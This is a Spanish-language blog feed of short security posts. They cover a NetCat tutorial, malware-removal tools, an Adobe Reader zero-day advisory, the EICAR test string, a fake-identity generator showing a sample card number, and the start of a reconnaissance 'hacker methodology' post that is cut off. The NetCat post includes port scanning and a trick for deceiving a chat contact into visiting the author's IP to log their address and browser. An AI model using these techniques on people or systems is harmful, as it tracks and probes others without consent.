tag:blogger.com,1999:blog-68823972349571787152024-02-20T12:12:47.166+01:00Solo el conocimiento te hace libreCibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.comBlogger69125tag:blogger.com,1999:blog-6882397234957178715.post-86798374879263588932010-01-10T19:42:00.004+01:002010-01-10T19:46:36.765+01:00NetCatNetCat, la navaja suiza de los hackers y administradores................<br /><br /><br />Netcat es un pequeño programa creado para uso de los<br />administradores de redes (y por supuesto para los Hackers) :), este<br />proggie fue creado originalmente por Hobbit y porteado a Win95 y NT por<br />Weld Pond de L0pht , tiene mas de un año desde que fue Liberado y muy<br />poco se ha escrito sobre este Programita; Principalmente porque la estructura<br />de sus comandos es poco familiar para el usuario medio. Netcat tiene<br />infinidad de funciones, aunque se deja que sea el usuario quien las<br />averigue :P, y en el archivo de ayuda ponen algunos ejemplitos muy<br />elementales solamente...<br /><br /> La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la<br />máquina de windows, cierto poder sobre este protocolo que solo tenía<br />UNIX, trabaja con lineas de comandos desde MS-DOS (o desde el<br />Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre<br />TCP/IP. El comando principal es nc con su respectiva variable u opción<br />al mas puro estilio Unix.<br /><br /><br /> Cabe destacar que la información sobre Netcat y sus usos<br />especificos es bastante limitada; aunque Hobbit en su documento aclara<br />muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado<br />para mas de 1001 vainas...<br /><br /><b><u><span style="color: rgb(0, 153, 0);">Ejemplos de como utilizar -NETCAT-.</span><br /></u></b><p style="font-weight: bold;" class="MsoNormal">(estos ejemplos pueden ser variados dependiendo de los modificadores)</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><b><u style="color: rgb(0, 153, 0);">Si queremos saber que versión de servidor esta corriendo en un puerto remoto</u><o:p></o:p></b></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Supongamos que queremos saber que versión webserver corre una determinada ip, para ello supongamos que la IP es 1.1.1.1, entonces tipearemos lo siguiente:</p> <p class="MsoNormal"><b>C:\nc –v –v 1.1.1.1 80<o:p></o:p></b></p> <p class="MsoNormal">Donde <span style="font-weight: bold;">nc es la invocación al netcat</span>, -v –v nos dará todo la info visible del servidor que esta corriendo, 1.1.1.1 es la ip y 80 el puerto al que nos queremos conectar, bien, no solo que nos dio la versión del servidor si no que ahora estamos conectados al webserver y podemos realizar las operaciones normales que podría hacer el browser(en línea de comandos, por su puesto), pero eso para otro capitulo jejejejejeje.</p> <p class="MsoNormal">Si quisiéramos saber la versión de cualquier otro servidor solo habrá que conectarse a el a través de su ip + puerto con la opción very vervose y ya sabremos algo de ese servicio ;)</p> <p class="MsoNormal"><span style=""> </span></p> <p class="MsoNormal"><b><u><span style="color: rgb(0, 153, 0);">Un chat p2p</span><o:p></o:p></u></b></p> <p class="MsoNormal"><b><u><o:p><span style="text-decoration: none;"> </span></o:p></u></b></p> <p class="MsoNormal"><span style=""> </span>Se necesita que los dos tengan netcat, uno va a actuar de servidor y otro de cliente.</p> <p class="MsoNormal">EL SERVER</p> <p class="MsoNormal"><b>C:\nc –l –p (numero de puerto)</b></p> <p class="MsoNormal">Donde nc llama al netcat, -l se pone a la escucha o en modo servidor, y –p es el puerto por donde escuchara</p> <p class="MsoNormal">EL CLIENTE</p> <p class="MsoNormal"><b>C:\nc ip puerto </b></p> <p class="MsoNormal">Donde nc llama al netcat, ip es la ip del server, y puerto el puerto que este abrió</p> <p class="MsoNormal">Una vez realizado esto, podrán escribir en la pantalla donde esta corriendo netcat y al dar ENTER el otro vera lo que escribamos, una opción rápida y segura</p> <p class="MsoNormal"><b><u><o:p><span style="text-decoration: none;"> </span></o:p></u></b></p> <p class="MsoNormal"><b><u><span style="color: rgb(0, 153, 0);">Como sacar la ip de cualquier mensajero ( y algunos otros datos jejejjej)</span><o:p></o:p></u></b></p> <p class="MsoNormal"><b><u><o:p><span style="text-decoration: none;"> </span></o:p></u></b></p> <p class="MsoNormal">Primero usamos la herramienta netcat (o nc) con la siguientes modificadores:</p> <p class="MsoNormal"><b>C:\nc -v -v -l -p 80</b> </p> <p class="MsoNormal">Donde nc llama al netcat, -v –v lo pone en modo very verbose y eso hace que al conectarse alguien a nuestra ip y puerto le rastrea la ip y los datos del browser y sistema operativo, -l lo pone en modo escucha o servidor , y –p 80 le asigna el puerto 80 a la escucha </p> <p class="MsoNormal">Luego le pasamos lo siguiente, http://nuestra ip (usando alguna excusa, si no queremos que nuestro contacto sospeche), automáticamente se abrirá su navegador y se dirigirá a donde esta nuestro netcat a la escucha, entonces veremos en la ventana DOS donde se esta ejecutando el netcat, la ip de nuestro contacto ( con suerte también veremos la versión del navegador que usa y alguna que otra cosita mas)luego que tomamos nota de la ip, hacemos ctrl+C para cerrar netcat, y le aparecerá a nuestro contacto, en el navegador pagina típica de cuando no se encuentra el servidor (esto no pasara hasta que no cerremos el netcat con ctrl+C), buscamos la excusa que mas nos guste para explicar que la page que le pasamos no funciono y listo</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><b><u><o:p><span style="text-decoration: none;"> </span></o:p></u></b></p> <p class="MsoNormal"><b><u><span style="color: rgb(0, 153, 0);">Si queremos hacer una trampa para lammers y capturar su ip</span><o:p></o:p></u></b></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Pues esto se basa en que un lamer, para entrar a una maquina, primero escanea puertos y si encuentra alguno vulnerable (como por ejemplo el puerto de un troyano) entra usando la herramienta necesaria.</p> <p class="MsoNormal">Bien, esto se trata de hacerle creer al lammeruzo que tenemos esos puertos que abren los servidores de los troyanos abiertos (por lo tanto pensara que estamos infectados y tratara de entrar por ese puerto y allí tendremos el netcat listo para cazar su ip</p> <p class="MsoNormal">Para esto abriremos tantos netcat como puertos queramos simular infección (seria bueno que busques una lista de puertos que usan los troyanos y abras los que te parezcan) y lo haremos si con cada puerto</p> <p class="MsoNormal"><b>C:\nc -v -v -l -p (numero de puerto de troyano)</b></p> <p class="MsoNormal">Donde nc llama al netcat, -v –v lo pone en modo very verbose y eso hace que al conectarse alguien a nuestra ip y puerto le rastrea la ip y los datos del cliente que uso para conectarse, -l lo pone en modo escucha o servidor, y –p (será el puerto que simulara que allí hay un troyano), listo de esa manera ya tenemos la ip de quien trato de entrar a nuestra maquina a través de un troyano.</p> <p class="MsoNormal">Cabe destacar que esto sirve para cualquier servicio como ser web o ftp</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><b><u><span style="color: rgb(0, 153, 0);">Mostrar una pagina web con netcat (o como simular un webserver)</span><o:p></o:p></u></b></p> <p class="MsoNormal"><b><u><o:p><span style="text-decoration: none;"> </span></o:p></u></b></p> <p class="MsoNormal">Todos sabemos que si queremos mostrar una pagina web necesitamos un webserver, bien aquí vamos a improvisar uno (simulado lógicamente).</p> <p class="MsoNormal">Para mostrar nuestra page en Internet haremos esto:</p> <p class="MsoNormal">1) guardamos el html que queremos mostrar, en la misma carpeta que se encuentra netcat, luego tipemos esto:</p> <p class="MsoNormal"><b>C:\nc –l –p 80 <></b></p> <p class="MsoNormal">Donde nc llama al netcat, -l hace que se ponga a la escucha, -p 80 hace que el puerto que escucha sea el el 80(el mismo del http), <> </p><p class="MsoNormal">Cabe destacar que cada vez que alguien se desconecta tendremos que volver a realizar la operación para que vuelva a ser visto el html</p> <p class="MsoNormal"><o:p> </o:p></p> <p style="color: rgb(0, 153, 0);" class="MsoNormal"><b><u>Transferir archivos con netcat</u></b></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Para transferir archivos con netacat primero tendré que destacar que solo hice la prueba con archivos zipeados, pero pueden probar con otros formatos, además, netcat no puede ver el EOF(end of file o final de archivo) así que no terminara la transferencia por si solo, cuando estimen un tiempo prudencial (si lo hacen antes de que termine se corta y se daña el archivo)deben darle ctrl+C para terminar la transferencia y así hacer un EOF. Bien, dicho esto pasemos al trabajo. Necesitaremos uno que haga de Server (el que envía el archivo) y uno que haga de cliente (el que recibe el archivo), para ello tipearemos:</p> <p class="MsoNormal">EL SERVER</p> <p class="MsoNormal"><b>C:\nc –l –p (puerto) <></b></p> <p class="MsoNormal">Donde nc llama al netcat, -l pone le puerto a la escucha, -p (puerto) sera el puerto que pondremos a la escucha, <> </p><p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">EL CLIENTE</p> <p class="MsoNormal"><b>C:\nc ip puerto > archivo.zip<o:p></o:p></b></p> <p class="MsoNormal">Donde nc llama al netcat, ip es la ip a la que queremos conectar, puerto es al puerto remoto que queremos conectar , > archivo,zip, es el redireccionamiento de la entrada a un archivo. </p> <p class="MsoNormal">Listo, si tenemos en cuenta todas las recomendaciones, transferiremos sin problemas</p> <p class="MsoNormal"><o:p> </o:p></p> <p style="color: rgb(0, 153, 0);" class="MsoNormal"><b><u>Conectarse a irc con netcat</u></b></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Bien para esto hay que destacar que es sencillo lograr la conexión pero no hay que olvidar que una vez lograda hay que “hablar idioma servidor” o sea hacer toda la negociación a mano.</p> <p class="MsoNormal">Para ello vamos a topear:</p> <p class="MsoNormal"><b>C:\nc servidor irc puerto</b></p> <p class="MsoNormal">Donde nc llama al netcat, servidor irc es el servidor al que nos queremos conectar, y puerto el puerto al cual vamos a conectarnos (para graficarlo mejor vamos a poner de ejemplo una conexión al canal yashira que esta en el sevidor irc.cl, el comando seria así <b>nc irc.cl 6667,</b> y listo ya estaríamos conectados), pero en esta parte considero que poner un ejemplo totalmente practico ayudaría bastante, por eso voy a desarrollar un ejemplo de cómo me conecto al canal yashira con netcat</p> <p class="MsoNormal">Para hacerlo tipeo el comando que me conecta</p> <p class="MsoNormal">Luego tipeo PONG mi ip (esto debo hacerlo rápidamente para que no de time out la conexión).</p> <p class="MsoNormal">Inmediatamente tenemos que identificarnos para eso topeamos:</p> <p class="MsoNormal">USER nombre que elijas (no es tu nick) tu host tu servidor: tu nombre real(esto puedes omitirlo, pero no olvides poner : y luego dejarlo vació), luego de eso tipeas:</p> <p class="MsoNormal">NICK tu nick </p> <p class="MsoNormal">pero mas grafico lo hago con el ejemplo practico:</p> <p class="MsoNormal"><b>USER yo NETGlobalis.irc.cl :<o:p></o:p></b></p> <p class="MsoNormal"><b>NICK cadorna<o:p></o:p></b></p> <p class="MsoNormal">aquí ya esta en el irc.cl para entrar al canal tipeas:</p> <p class="MsoNormal"><b>join #canal </b>(en mi caso join #yashira)</p> <p class="MsoNormal">ya tamos en el canal, ahora si queres hablar tipeas:</p> <p class="MsoNormal"><b>PRIVMSG #canal :texto</b> (en mi caso digo hola, PRIVMSG #yashira : hola)</p> <p class="MsoNormal">Cabe destacar que si bien es un método complicado y muchas veces las negociaciones dependen del servidor, nos muestra la versatilidad de netcat, y estos no son todos los comandos de irc experimenta comandos que usas en el con netcat, tal vez resulte interesante (les dejo un poco de experimentación para ustedes, si no me van a matar jajajajajajaaj)<o:p></o:p></p> <p class="MsoNormal"><b><o:p> </o:p></b></p> <p class="MsoNormal"><b><u><span style="color: rgb(0, 153, 0);">Hacer un sencillo escanner de puertos con netcat</span><o:p></o:p></u></b></p> <p class="MsoNormal">Esto es muy simple para chequear los puertos abiertos de una maquina debemos topear:</p> <p class="MsoNormal"><b>C:\nc –v –v -z ip puerto </b>(cabe destacar que si queremos hacer un scanner de rango de puertos debemos separa ese rango con un “-“ por ejemplo queremos escasear todos los puertos desde el 21 al 139, debemos hacer así: nc –v –v –z ip 21-139, y si lo que queremos es escasear puertos determinados<span style=""> </span>hay que separar los números de puertos con espacio por ejemplo nc –v –v –z ip 21 25 139, de esta manera buscara solo en esos puertos)<o:p></o:p></p> <p class="MsoNormal">Donde nc llama al netcat, -v-v lo pone en modo veri vervose(ideal para sacar datos), z realiza la llamada al puerto pero si llegar a hacer la transacción de conexión, ip es la ip a escannear , y puerto es el puerto a escannear, esto nos devolverá una lectura de open(puerto abierto) o conection refused (puerto cerrado), y hasta a lo mejor recibas que servicio esta corriendo en ese puerto abierto</p><p class="MsoNormal">fuente: http://hackdosx.blogspot.com/<br /></p>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com5tag:blogger.com,1999:blog-6882397234957178715.post-72515076080691280852010-01-07T18:13:00.003+01:002010-01-07T18:16:49.649+01:00Cómo eliminar virus de MSN Messenger y Windows Live MessengerAqui tenis un recopilatorio de los programas mas usado:<br /><br /><br />Recientemente, las mentes dedicadas a la creación de virus han centrado sus esfuerzos en el cliente de mensajería instantánea de Microsoft. <p>Por suerte, otras mentes más generosas se han puesto manos a la obra y han contraatacado con programas específicos para eliminar los virus <em>del Messenger</em>.</p> <p>En este artículo recopilamos varias herramientas para eliminar virus de MSN Messenger. ¿Quieres conocerlas?<span id="more-3044"></span></p> <p>La primera utilidad es <strong><a href="http://msn-virus-remover.softonic.com/">MSN Virus Remover</a></strong>. Está en español y mantiene su base de datos de virus actualizada. En este momento detecta 11.675 virus.</p> <p>Además, si el virus te había bloqueado el acceso al Editor del Registro, al Administrador de tareas, a la configuración de las funciones de restauración o a las Opciones de carpeta, MSN Virus Remover te lo devuelve.</p> <p style="text-align: center;"><img src="http://es.onsoftware.com/wp-content/uploads/2009/04/msn1.png" /></p> <p>Otra interesante opción es <a href="http://msn-virus-cleaner.softonic.com/"><strong>MSN Virus Cleaner</strong></a>. Analiza, detecta y elimina los procesos sospechosos relacionados con MSN Messenger. También tiene accesos para desinfectar archivo y carpeta, así como para eliminar la caché y vaciar la Papelera de Reciclaje.</p> <p>Una ventaja de MSN Virus Cleaner es que detecta y elimina virus de otros clientes de mensajería como Yahoo! Messenger o AOL.</p> <p style="text-align: center;"><img src="http://es.onsoftware.com/wp-content/uploads/2009/04/msnviruscleaner.png" width="575" height="473" /></p> <p>También existe <strong><a href="http://livekill-clean-messenger.softonic.com/">Live Kill Clean Messenger</a></strong> pero parece un proyecto abandonado, cuanto menos inacabado. Sólo lo recomendamos por si los dos anteriores no han conseguido eliminar el virus que tengas y no te importa probar suerte con LiveKill Clean Messenger.</p> <p style="text-align: center;"><img src="http://es.onsoftware.com/wp-content/uploads/2009/04/livekill.jpg" /></p> <p>Finalizamos con el más popular: <strong><a href="http://msncleaner.softonic.com/">MSNCleaner</a></strong>. Está en español, no requiere instalación, es rápido, eficaz, seguro y fácil de utilizar.</p> <p>Como MSN Virus Remover, MSNCleaner también te devuelve el acceso al Editor del Registro, al Administrador de tareas, a la configuración de las funciones de restauración o a las Opciones de carpeta. Además, también restaura el archivo Hosts (a tener en cuenta si lo tenías personalizado).</p> <p style="text-align: center;"><img src="http://es.onsoftware.com/wp-content/uploads/2009/05/msncleaner.png" /></p> <p><br /></p><p><br /></p><p>fuemte:http://es.onsoftware.com/<br /></p>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-33420319556731954612010-01-03T17:36:00.002+01:002010-01-03T17:38:13.072+01:00Recupera archivos borrados en tu disco duro o tarjeta de memoria<div id="prg_description" class="description_l"> <div id="intelliTXT"> <div id="desc_body" class="description"> <p>¿Has borrado archivos sin querer? No te desesperes, hoy en día hay decenas de aplicaciones para recuperar los archivos borrados, <a href="http://undelete-plus.softonic.com/descargar">Undelete</a> Plus sin ir más lejos.</p> <p>Este programa gratuito analizará tu disco duro, dale tiempo, este proceso suele tardar mucho (incluso horas, dependiendo del tamaño del disco duro), y te mostrará todos los archivos que encuentre.</p> <p>Como sabrás, cuando un archivo se borra el espacio que ocupaba en tu disco duro pasa a estar libre, así que si has seguido utilizando ese PC aumentan las posibilidades de que el espacio que ocupaba el archivo haya sido ocupado por un nuevo inquilino, con lo que será más complicado que lo puedas recuperar. Undelete Plus te lo indica en su columna "Estado".</p> <p>Volviendo al programa, encontramos dos interesantes cualidades: la ordenación por tipos de archivos y el filtro. La primera resulta muy útil si deseas recuperar algún tipo de archivo en concreto, un documento, unas fotos, etc. La segunda cualidad es utilísima para ver sólo los archivos que reúnan las características que le indiques, como mayor o menor de un tamaño concreto, los comprendidos entre una fecha o los que contengan una determinada palabra en su nombre.</p> </div> </div> <div id="more_info" class="clearfix"> <h3>Undelete Plus soporta los siguientes formatos:</h3> <p>Sistemas de archivos: NTFS/NTFS5, FAT12/FAT16/FAT32</p> <h3>Cambios recientes en <strong>Undelete Plus</strong>:</h3> <ul><li>Pequeños cambios en la interfaz</li></ul> <h3>Para utilizar <strong>Undelete Plus</strong> necesitas:</h3> <ul class="clearfix"><li>Sistema operativo: Win98/98SE/Me/2000/NT/XP/2003 </li></ul> </div> </div>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-11956759741343706442009-12-28T14:30:00.002+01:002009-12-28T14:31:57.872+01:000 Day en Adobe Acrobat Reader<p class="date-header"><br /></p> <a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCUchQ7TRSXGnaKEsvNIQgHuMWGZByGBvCgWKexrKtJN8LQ2X2H0YKThia1Vsda0k9rlF0ysyxjuTQPI7mLBIKa762Q5owgDQROegm1A085jWb-qhhOXgQGugbBfKKy7eHh7iEVIrhHmU/s1600-h/acrobat+reader.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 184px; height: 145px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCUchQ7TRSXGnaKEsvNIQgHuMWGZByGBvCgWKexrKtJN8LQ2X2H0YKThia1Vsda0k9rlF0ysyxjuTQPI7mLBIKa762Q5owgDQROegm1A085jWb-qhhOXgQGugbBfKKy7eHh7iEVIrhHmU/s400/acrobat+reader.jpg" alt="" id="BLOGGER_PHOTO_ID_5416318900995736354" border="0" /></a>Bueno de nuevo tenemos otra<a href="http://es.wikipedia.org/wiki/Ataque_de_d%C3%ADa_cero"> vulnerabilidad 0 day</a> en una aplicación muy conocida y utilizada por muchos usuarios, <a href="http://www.adobe.com/es/products/reader/">Adobe Acrobat Reader</a>.<br /><br />La gente de Adobe no ganan para sustos <span style="font-weight: bold;">y es que dicho bug es incluso indetectable por las mejores soluciones antivirus</span> (aunque se espera que esto cambie en breve) la vulnerabilidad identificada como <a href="http://www.securityfocus.com/bid/37331">CVE-2009-4324</a> es critica y por ello se han publicado unos consejos para paliar en la medida de lo posible este agujero hasta que este disponible el parche que resuelva el problema que<a href="http://blog.segu-info.com.ar/2009/12/adobe-solucionara-la-vulnerabilidad-de.html"> segun Adobe sera el 12 de Enero.</a><br /><br /><span style="font-weight: bold;">¿Como protegernos?</span><br /><br />Una de las opciones para protegernos mientras llega el día D seria esta aplicación <a href="http://kb2.adobe.com/cps/532/cpsid_53237.html">Acrobat JavaScript Blacklist Framework</a> que descarga un par de archivos que modifican el registro. Otra opción viable seria el desactivar Javascript del propio Acrobat Reader desde Editar--Preferencias--Javascript, por supuesto el utilizar el Addons<a href="https://addons.mozilla.org/es-ES/firefox/addon/722"> Noscript</a> para los usuarios de Firefox no viene nada mal para esta situación en cuestión y para muchas otras , en fin que como veis podemos protegernos mientras llega el ansiado día 12 de Enero. Por ultimo podemos elegir por desinstalar directamente la aplicación de Adobe e instalar otro lector de archivos PDF como por ejemplo los que aparecen en esta <a href="http://pdfreaders.org/">web</a>.<br /><br />Para mas información sobre esta vulnerabilidad critica Adobe a puesto a disposición de los usuarios esta pagina <a href="http://blogs.adobe.com/psirt/">blog PSIRT</a> desde donde la cual podremos seguir las evoluciones del bug que afecta actualmente a Adobe Acrobat Reader.<br /><br />Fuente: <a href="http://hackdosx.blogspot.com/">Hackdosx</a>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-24059920884072334502009-12-22T15:15:00.002+01:002009-12-22T15:18:44.679+01:00Verificar si el antivirus funciona correctamenteEn muchas ocasiones dudamos si nuestro antivirus está funcionando de la forma en que debe, es decir, si está siempre activo (modo residente), actualizado y pendiente de todo lo que en nuestro sistema se ejecuta; pero, ¿cómo podemos saberlo? Fácil, un simple truco.<br /><br />Copiar un codigo malicioso en el block de notas y guardarlo si el anti-virus lo detcta funciona bien.<br /><br /><span class="entry">1. Abrimos el Bloc de notas, luego escribimos la siguiente línea de código: <p><span style="font-size: 8pt;"><code>X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*</code></span>.</p><p><span class="entry">2. Guardamos el archivo de texto. En seguida, el antivirus debe mostrarnos de una vez la advertencia de que encontró un código malicioso.</span><br /></p><p>3. Si el antivirus no te envía ninguna alerta, algo está mal, así que debes verificar qué está pasando, reinistalar el antivirus, o buscar alguna solución alterna. </p></span> <p>Este pequeño código (“malicioso”) simulará un virus, por lo que el antivirus lo va a detectar como si se tratara de alguno, pero no te preocupes, que si lo detecta como tal, debes más bien alegrarte, pues estarás seguro de que tu antivirus funciona correctamente.<br /></p><span class="entry"><p><br /></p></span>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com1tag:blogger.com,1999:blog-6882397234957178715.post-92021335013592898972009-12-21T19:43:00.001+01:002009-12-21T19:45:02.413+01:00Eliminar falsos antivirus del sistema con Remove Fake Antivirus<span class="entry"><p align="center"><a href="http://www.bloginformatico.com/wp-content/uploads/2009/05/removefakeantivirus.jpg"><img title="Remove Fake Antivirus" style="border: 0px none ; display: inline;" alt="Remove Fake Antivirus" src="http://www.bloginformatico.com/wp-content/uploads/2009/05/removefakeantivirus-thumb.jpg" border="0" width="242" height="133" /></a> </p> <p>¿<em>Falsos antivirus</em>? Muchas veces hemos leído en blogs como <a href="http://spamloco.net/search/label/Antivirus%20falsos" target="_blank">el de SpamLoco</a> que existen antivirus que no son tan auténticos como tal, sino que se tratan de programas espía que te engañan, promocionándote una solución en su “gran antivirus” a problemas de seguridad.</p> <p>Entonces cuando procedemos a instalar estos antivirus falsos, nuestro sistema se llenará de cualquier basura informática. Pero tranquilo, que para combatir esas porquerías conocí <strong>Remove Fake Antivirus</strong>, cuyo objetivo es eliminar falsos antivirus instalados en tu sistema.</p> <p>Pues bien, los <a href="http://www.bloginformatico.com/etiqueta/falsos-antivirus">falsos antivirus</a> que soporta <strong>Remove Fake Antivirus</strong> son: Personal Antivirus, Anti-Virus-1, Spyware Guard 2008, Antivirus 360, SystemGuard2009, Antivirus 2009, System Security, Antivirus 2010, Antivirus Pro 2009, y MS Antispyware 2009. Son los más comunes.</p> <p><strong>Remove Fake Antivirus</strong> está en inglés, lamentablemente, pero funciona en Windows Vista, XP, 2003, 7, entre otros. Aunque carece de diferentes opciones para el usuario, lo que sí le aseguro a cualquier lector del blog es que es muy fácil de usar y a su vez bastante efectivo.</p><p><span class="entry">Enlace web | <a href="http://freeofvirus.blogspot.com/2009/05/remove-fake-antivirus-10.html" target="_blank">Remove Fake Antivirus</a></span></p><p><br /></p><p>fuente: http://www.bloginformatico.com<br /><span class="entry"></span></p></span>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-60441325518338309732009-12-19T16:17:00.003+01:002009-12-19T16:22:26.499+01:00E-mail desechable, anónimo y gratuito. Servicio Anti SPAM.<h2 class="nw alc">Correo Electrónico Temporal</h2><br /><h4>Todas las posibilidades de direcciones temporales ya existen</h4>Disponga de un correo electrónico válido para sus inscripciones en Internet. Todas las cajas de recepción están disponibles y accesibles sin inscripción ni contraseña<br /><br /><center><div class="b nw" style="width: 200px; position: relative; top: -8px;"><div class="good" style="margin-left: 20px;"><h5><b>No registro!</b></h5></div><div class="good" style="margin-left: 20px;"><h5><b>Sin contraseñ!</b></h5></div><div class="good" style="margin-left: 20px;"><h5><b>auto generados buzón!</b></h5></div><div class="good" style="margin-left: 20px;"><h5><b>mensajes de 8 días mantenido!</b></h5></div></div></center><br /><br /><h4>Este correo electrónico cubo de la basura y anti-spam le permitirá no recibir más a los correos indeseables sobre su cuenta e-mail personal. </h4><h2 class="alc">¿Cómo funciona esto?</h2> <ul><li class="pdet">Basta con utilizar cualquier <strong>correo electrónico desechable</strong> (ex : '<quenimporte>@yopmail.com') para sus inscripciones, demandas de informaciones o de documentaciones sobre los sitios Internet. El mails enviados por estos sitios son instantáneamente consultables en su <strong>buzón provisional </strong> '<quenimporte>' sobre el sitio www.yopmail.com o directamente por: <span class="b">http://www.yopmail.com?quenimporte</span></li><li class="pdet">No es necesario crear una dirección sobre YopMail.com: todas las posibilidades ya existen. Estos correos electrónicos falsos jamás son suprimidos. En cambio, cada mensaje automáticamente es suprimido al cabo de 8 días. Es tan posible suprimir manualmente los mensajes leídos .</li><li class="pdet">YopMail no permite el envío de <strong>e-mail anónimo</strong>. Usted puede sin embargo enviar un <strong>e-mail anónimo</strong> hacia las direcciones YopMail. </li></ul><br />enlace: http://www.yopmail.com/es/Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-69632794359608995532009-12-18T16:09:00.003+01:002009-12-18T16:51:25.271+01:00Ultimate Boot CD para Windows<div style="text-align: left;">El sistema operativo de Microsoft es una verdadera caja de ( <strike>sorpresas)</strike> disgustos, y esto resulta especialmente sangrante para los que somos aficionados a hacerle pasar por todas las perrerías posibles. <strong>Seguro que a más de uno le ha pasado</strong> que, por haber toqueteado lo que no debía, o simplemente por un error humano perfectamente comprensible, el buen Windows le decide dejar de arrancar. </div><p>¿Qué toca entonces? Pues ya se sabe: formateo y a empezar de nuevo, aunque puede que con ello perdamos material personal o profesional muy valioso (esas copias de seguridad…). Por suerte hay una alternativa bastante efectiva para este problema, y encima de todo es gratuita. Se trata de Ultimate Boot CD, un disco de arranque que incluye una importante colección de herramientas de diagnóstico y reparación de errores, y gracias a las cuales <strong>es capaz de solucionar casi cualquier fallo del sistema</strong>. No resulta infalible, pero en cualquier caso es un elemento directamente imprescindible en todos aquellos hogares que usen el “Ventanas”.</p><p><br /></p><p><a target="_blank" href="http://www.ultimatebootcd.com/download.html">Mirrors de descarga de Ultimate Boot CD 3.4</a></p><p><br /></p>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-48355964463330391902009-12-16T18:25:00.004+01:002009-12-16T18:31:24.744+01:00Generador de identidades falsas<a href="http://es.fakenamegenerator.com/gen-male-sp-sp.php">Generador de identidades falsas.....<br /></a><br />Si quieres registrarte en una web y ese dia no te encuentras lo suficientemente inspirado como para inventarte todos los campos se suelen requerir te vendrá muy bien este generador de identidades falsas.<br /><br />La identidad es configurable (sexo, país...) y muy completa, incluso incluye numero de Visa con fecha de caducidad. El resultado lo puedes guardar como permalink o vCard. Un ejemplo de personalidad generada con esta web:<br /><br /> Jodi R. Glass<br /> 899 Pell Drive<br /> Fort Lauderdale, FL 33301<br /><br /> Email Address: Jodi.R.Glass@mytrashmail.com<br /><br /> Phone: 954-825-1716<br /> Mother's maiden name: Huebner<br /> Birthday: March 16, 1980<br /><br /> Visa: 4539 7828 0655 6150<br /> Expires: 1/2009Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-44358661354263975172009-12-13T20:14:00.003+01:002009-12-13T20:15:50.725+01:00Los fallos del software de código abierto se solucionan antes<p>Una serie de estadísticas realizadas por la compañía Vercacode afirman que tres cuartas partes del software no cumplen con un nivel aceptable de seguridad.</p><br /> <p>El software de código abierto es más propenso a fallos graves de seguridad, pero se arreglan más rápido. Esto es al menos lo que se desprende de una investigación realizada por la empresa de seguridad <a href="http://www.veracode.com/" target="_blank">Veracode</a> y a la que ha tenido acceso <a href="http://www.v3.co.uk/" target="_blank">V3.co.uk</a>.</p> <p>El proyecto Open Source Ratings Database es un repositorio centralizado de evaluaciones de seguridad de programas de código abierto que incluye el análisis de cerca de cien aplicaciones empresariales, incluidas Firefox, Apache, MySQL o JBoss.</p> <p>Los últimos datos muestran que el 24% del software open source tiene un “nivel de seguridad aceptable” y que el software comercial es sólo ligeramente peor, con un porcentaje del 23%. Del informe también se desprende que el 23% de la fuente abierta, y sólo el 5% de las aplicaciones comerciales, contienen al menos un fallo de seguridad grave.</p> <p>En cuanto a los tiempos, al software de código abierto le lleva menos de una semana remediar una vulnerabilidad, según la investigación.</p> <p>Fuente:<br />Por Rosalía Arroyo<br /><a href="http://www.itespresso.es/" target="_blank">http://www.itespresso.es</a></p>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-1703935558607084622009-12-12T19:30:00.003+01:002009-12-12T19:37:40.097+01:00Metodología del Hacker<span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">1.- Búsqueda de Información</span></span><br /><br />Una cautelosa búsqueda de sistemas y recopilación de información es el primer paso antes de<br />ponerse a experimentar. Debe comprobarse qué máquinas componen el sistema y qué rango de<br />direcciones IP ocupan. Esto nos dará una idea del alcance y la complejidad del trabajo que va a ser<br />realizado y ayuda a identificar los puntos débiles por los que hay que empezar a realizar las pruebas.<br />Muchas veces podemos tener acceso a información pública sobre una empresa cualquiera, pero no<br />conocemos los métodos para conseguirla. La base de datos NIC (Network Information Center), donde<br />se almacenan los datos de las personas o empresas que han comprado un dominio de tipo .com, .mx,<br />.net, etc, es un buen punto por donde arrancar. Con esta base de datos NIC podremos encontrar<br />nombre de los responsables, tanto técnicos como administrativos, números de teléfono, correos,<br />direcciones físicas. Esta dirección está ahí para gestionar la compra de dominios. Los datos 